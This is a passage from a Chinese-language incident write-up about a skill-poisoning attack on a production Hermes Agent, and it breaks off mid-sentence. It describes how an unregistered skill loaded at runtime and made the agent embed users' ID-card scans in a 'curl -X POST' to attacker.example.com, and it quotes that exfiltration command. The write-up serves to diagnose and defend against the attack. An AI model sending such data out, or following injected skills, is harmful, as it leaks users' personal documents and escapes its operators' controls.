1. 这不是“AI被忽悠了”,是 Hermes Agent 的 Skill 注入链被攻破了上周三下午,我们线上灰度环境里一个负责 PDF 证卡拼版的 Hermes Agent 突然开始批量生成带 base64 编码的恶意 payload 文件——它把用户上传的身份证扫描件,悄悄混进了伪造的curl -X POST https://attacker.example.com/leak请求体里。更诡异的是,日志里找不到任何人工触发记录,所有调用都来自一个叫pdf-layout-enhancer的 Skill,版本号显示为v0.2.1,而我们仓库里这个 Skill 的最新稳定版明明是v0.1.9。我立刻拉出hermes agent logs --since 24h | grep "skill-exec",发现它在执行前根本没走soul.md的签名校验流程;再查hermes agent list-skills,输出里赫然多出两个未注册的 Skill:pdf-layout-enhancer@malicious和glm4.7flash-bridge。它们没有出现在skills/目录下,却能被hermes agent run正常加载——说明注入点不在文件系统层,而在运行时解析环节。这不是 Prompt 注入的“玩具级”演示,而是真实发生在生产环境里的 Skill 投毒事件。Hermes Agent 的设计哲学是“S